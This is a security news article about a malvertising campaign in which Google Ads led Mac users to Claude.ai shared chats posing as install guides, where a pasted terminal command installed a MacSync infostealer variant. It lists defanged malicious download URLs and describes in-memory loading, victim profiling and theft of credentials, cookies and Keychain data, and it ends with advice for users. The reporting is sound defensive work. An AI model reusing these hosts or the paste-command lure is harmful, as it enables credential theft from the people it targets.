Malvertising Campaign Targets Mac Users
Attackers are exploiting Google Ads and legitimate Claude.ai shared chats to push Mac malware, as discovered by Berk Albayrak, a security engineer at Trendyol Group. The campaign was identified when users searching for 'Claude mac download' were presented with sponsored search results that appeared to be from the official Claude website, but instead led to instructions that installed malware on their Mac.
Albayrak found a Claude.ai shared chat that presented itself as an official 'Claude Code on Mac' installation guide, attributed to 'Apple Support.' The chat instructed users to open Terminal and paste a command, which silently downloaded and ran malware on their Mac. BleepingComputer verified the findings and discovered a second shared Claude chat carrying out the same attack through separate infrastructure.
MacOS Malware Analysis
The base64 instructions shown in the shared Claude chat downloaded an encoded shell script from domains such as hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e and hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d. The 'loader.sh' script ran entirely in memory, leaving little obvious trace on disk.
BleepingComputer observed the server serving a uniquely obfuscated version of the payload on each request, making it harder for security tools to flag the download based on a known hash or signature. The script collected the victim's external IP address, hostname, OS version, and keyboard locale, sending all of it back to the attacker. This kind of victim profiling before payload delivery suggests the operators are being selective about who they target.
Malware Behavior
The script then pulled down a second-stage payload and ran it through osascript, macOS's built-in scripting engine. This gave the attacker remote code execution without ever dropping a traditional application or binary. The variant identified by Albayrak appeared to skip the profiling steps and went straight to execution, harvesting browser credentials, cookies, and macOS Keychain contents, packaging them up, and exfiltrating them to the attacker's server.
Albayrak identified this as a variant of the MacSync macOS infostealer. The briskinternet[.]com domain shown in the variant identified by Albayrak appeared to be down at the time of writing.
Malvertising Campaigns on the Rise
Malvertising has become a recurring delivery mechanism for malware. This campaign flips the traditional approach, as there is no fake domain to spot. Both Google ads seen here point to Anthropic's real domain, claude.ai, since the attackers are hosting their malicious instructions inside Claude's own shared chat feature.
Users should navigate directly to claude.ai for downloading the native Claude app, rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface. It is good practice to generally treat any instructions asking you to paste terminal commands with caution, regardless of where those instructions appear to come from.
- Users searching for 'Claude mac download' may come across sponsored search results that lead to malware installation instructions.
- Claude.ai shared chats are being used to host malicious instructions that install Mac malware.
- The malware collects victim information and exfiltrates it to the attacker's server.
- Users should be cautious when clicking on sponsored search results and avoid pasting terminal commands from untrusted sources.
Source: BleepingComputer